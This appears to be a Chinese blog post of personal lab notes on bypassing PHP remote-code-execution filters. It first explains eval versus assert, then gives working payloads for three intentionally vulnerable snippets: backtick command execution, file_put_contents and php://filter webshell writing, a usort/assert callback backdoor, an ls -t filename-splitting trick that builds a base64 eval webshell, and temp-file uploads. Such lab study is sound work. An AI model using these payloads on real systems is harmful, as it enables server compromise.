当前位置：首页 > news >正文

RCE绕过练习

news 来源：原创 2024/9/21 12:26:16

一.了解eval与assert

eval与assert区别_eval assert-CSDN博客https://blog.csdn.net/qq_53568983/article/details/129782507

看了php官方文档,assert中提到的许多名词不明白,转而搜索文章,这篇是解释的是最直白的

其中提到eval不是一个函数,是语言构造器,不能被可变函数调用

什么是语言构造器和可变函数

你提到的“语言构造器”，英文是"language construct"，是语言构成的意思，翻译成语言构造器难免有点令人困惑。PHP里有echo、print、die、require等几个特殊的关键字，虽然它们用起来像是函数，但实际上更类似于if、while这样控制语句，而不是一个函数。也就是说，当解释器遇到：

print 'Hello world';

这样的一个表达式的时候，并不会把它转换成函数调用，而是直接映射到一系列预先定义好的操作。使用语言构成的时候可以加括号，也可以不加括号，但是使用函数的时候必须加括号。

你提到的“可变函数”，英文是"variable function"，变量函数的意思，翻译成“可变函数”也有点扭曲原义，把variable（变量）这个名词按形容词（可变）的含义来翻译了。PHP里的Variable function是指如果在一个变量后面加上一对括号，那么解释器会试图寻找名字和这个变量的值一样的一个函数，如果找到了就执行它。例如，有一个函数foo()，那么可以用下面这种方式调用这个函数：

// 初始化一个字符串变量
$func = 'foo';// 找到名字和这个字符串一样的函数，并且执行它
$func();

所以，你提到的这句话的含义就是，使用变量函数这种方式来调用一个语言构成是不允许的，例如下面这样：

$func = 'print';// 这样做会产生异常，因为print不是一个函数，而是语言的构成部分
$func('hello world');

执行这段代码，会产生一个异常，函数print没有定义。

eval可以动态传参,但是不能作为回调函数传递,也不可以像函数一样被动态调用

assert

我们看官方文档,提到的asser的用法,其中有两个参数assertion与description

assert(mixed $assertion, Throwable|string|null $description = null): bool

不明白啥是断言,不重要,但是看到了assert会运行assertion参数,查看警告内容发现

感觉这里就是老师为什么写,因为当assertion参数为string时,会用eval执行,那直接写不是也可以

以及为什么当时传参数&post会失败,因为要求assertion参数为带返回值的表达式或字符串,用eval包裹起来是本质就是会用eval来执行.

assert(eval(),$post[])

RCE-1

这里想用Linux环境的,但是不知道说未找到文件,可是文件在啊

不纠结这个,用了小皮直接弄,看第一题代码

<?php
$param = $_REQUEST['param'];  If (
strlen($param) < 17 &&  stripos($param, 'eval') === false &&  stripos($param, 'assert') === false
) {
eval($param);
}

要求长度在17个字符内且不出现关键字eval与assert

发现第一题要执行代码,还是弄Linux

研究了下发现是习惯了小皮写路径,Linux不写就可以了

1题关键在于不能用eval和assert执行命令

方法1

http://192.168.23.132/xiaoa.php?param=echo%20`$_GET[1]`;&1=id

更改子句即可达到不同效果,但是要注意权限

PPT里说可以用exec,那system应该也可以

不可以,应该是超长度了

方法2

使用file_put_contents函数

这个函数的作用是将数据写入文件的

file_put_contents(string $filename,mixed $data,int $flags = 0,?resource $context = null
): int|false

其中有四个参数

$filename是要传入的参数名,$date是传入数据 ,$flags是

于是便有语句

http://192.168.23.132/xiaoa.php?1=file_put_contents&param=$_GET[1](N,P,8);

通过多次追加让文件N内形成经过base64转码后的php脚本

注:1.用base64转码是因为有部分特殊字符,file_put_contents无法追加.

2.$flag位置该写FILE_APPEND

表示追加,写8的原因一个是php底层C语言代码8代表追加,另一个是FILE_APPEND会超出长度限制

追加完成后用方法3中include执行

http://192.168.23.132/xiaoa.php?param=include$_GET[1];&1=php://filter/read=convert.b%20%20ase64-decode/resource=N

方法3

include会把文件当作php文件执行

phpinfo(); ⇒ $_FILES[file][tmp_name] ⇒ include

这是PPT上的语句,看看啥意思

解释说这是一个超全局数组,tmp_name是临时文件名,意思是会将上传的临时文件当作php代码执行

猜测是前面的子句作为文件内容传递给数组,再传递给include执行

方法4

PHP5.6+变长参数 ⇒ usort回调后门 ⇒ 任意代码执行

?1[]=test&1[]=phpinfo();&2=assert

我用的php是7.4的,... 代表可变长参数,里面的参数这里有2个

第一个是数组,第二个是回调函数assert,把数组里的数据全部传给回函数执行

RCE-2

代码,要求长度不能大于8

<?php
$param = $_REQUEST['param'];  
If ( strlen($param) < 8 ) 
{  echo shell_exec($param);
}

shell_exec可以执行shell脚本

方法1

第一步先用data>file把脚本生成,这个可以将数据内容重定向文件,不要内容,将文件名当作命令慢慢拼凑

ls -t ech\ o \ PD9\ waH\ AgZ\ XZh\ bCg\ kX0\ dFV\ Fsx\ XSk\ 7|\ bas\ e64\ -\ d>\ xx.p\ hp

ls -t命令会以时间顺序展示文件,去掉换行符就是一条完整的语句

换行符每次都被\转义

发现这个方法的简直是个人才,这都可以

RCE-3

无字母数字webshell代码

<?php
if(isset($_GET['code'])){$code = $_GET['code'];if(strlen($code)>35){die("Long.");}if(preg_match("/[A-Za-z0-9_$]+/",$code)){die("NO.");}eval($code);
}else{highlight_file(__FILE__);
}

php7下的解决方法

不允许出现字母数字,就直接子句位取反

PHP5下的解决方法

利用上传产生的临时文件,执行临时文件生成脚本

难点:如何匹配临时文件

答:临时文件结尾字母为大写字母高概率

Linux中有glob通配符

Glob通配符-CSDN博客https://blog.csdn.net/zhuchuji/article/details/51297819如何上传临时文件

1.先建立一个脚本文件

2.写一个html文件提交页面

<!DOCTYPE html>
<html lang="en">
<head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><title>Document</title>
</head>
<body><form action="xiaoa.php" method="post" enctype="multipart/form-data"><input type="file" name="file" id=""><input type="submit", value="submit"></form></body>
</html>

3.第三步抓包,抓到提交包和访问包